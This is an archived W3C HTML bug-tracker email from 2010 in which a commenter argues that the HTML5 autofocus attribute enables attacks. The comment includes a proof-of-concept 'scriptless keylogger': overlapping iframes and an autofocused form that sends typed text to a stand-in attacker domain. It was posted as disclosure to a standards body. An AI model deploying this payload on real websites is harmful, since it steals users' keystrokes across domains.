W3C home > Mailing lists > Public > public-html-bugzilla@w3.org > April 2010

[Bug 9602] That autofocus attribute will wreak security havok. What an ignorant idea to bring more logic to HTML. I think I know a couple of ways to abuse it, since it actually is some sort of flow control, which only scripting languages should be capable of. I hope

From: <bugzilla@jessica.w3.org>
Date: Wed, 28 Apr 2010 15:49:29 +0000
To: public-html-bugzilla@w3.org
Message-Id: <E1O79Vx-0004K6-23@jessica.w3.org>
http://www.w3.org/Bugs/Public/show_bug.cgi?id=9602


Skyphire <sasha@scarletred.nl> changed:

           What    |Removed                     |Added
----------------------------------------------------------------------------
                 CC|                            |sasha@scarletred.nl




--- Comment #1 from Skyphire <sasha@scarletred.nl>  2010-04-28 15:50:08 ---
Scriptless keylog primer PoC.

It still requires an ENTER Key Event, But we might be able to bubble focus
through the FOR attribute to get even more flow control. Granted, this was
possible with JavaScript enabled before, but never without JavaScript since
there was no way to get focus from flow control from another domain, until now.
This is only an example of what autofocus can be capable of. I am sure more
elegant attacks are possible, given the time to think them up.  

!!Legitform.html (on trusted domain)

<!doctype html>
<html>
<head>
<meta charset="UTF-8">
<title>Scriptless keylog primer</title>
</head>
<body>
<form name="logo" method="post" action="http://www.google.com">
<input type="text" name="log">
<input type="submit" name="submit" value="submit">
</form>
</body>
</html>

!!Keylog.html (on untrusted domain)

<!doctype html>
<html>
  <head>
<meta charset="UTF-8">
<title>Scriptless keylog primer</title>
</head>
<body>
<form name="logo" method="GET" action="http://www.scriptkiddie.universe.com">
<input type="text" name="log" autofocus> <!-- Due to autofocus, Frame F2 gets
the focus. Even when it's below Frame F1! -->
<input type="submit" name="submit" value="submit">
</form>
</body>
</html>


!!Test.html (on trusted domain, possibly injected/stored reflected XSS or
simply from unsanitized code)

<!doctype html>
<html>
<head>
<meta charset="UTF-8">
<title>Scriptless keylog primer</title>
</head>
<body>

<!-- This is only to watch what exactly happens, irl we set Frame F2 with a
fixed top position of about 19px/20px to let Frame F1 overlap Frame F2 -->
<iframe name="F1" src="legitform.html" style="position:absolute; top:18; 
left:90; z-index:3; height:25px; background-color:cyan;" scrolling="no">
</iframe>

<iframe name="F2" src="keylog.html" style="position:absolute; top:50; left:90;
z-index:2; height:25px; background-color:magenta;" scrolling="no">
</iframe>

</body>
</html>


-Skyphire.

-- 
Configure bugmail: http://www.w3.org/Bugs/Public/userprefs.cgi?tab=email
------- You are receiving this mail because: -------
You are the QA contact for the bug.
Received on Wednesday, 28 April 2010 15:50:13 GMT

This archive was generated by hypermail 2.2.0+W3C-0.50 : Wednesday, 28 April 2010 15:50:18 GMT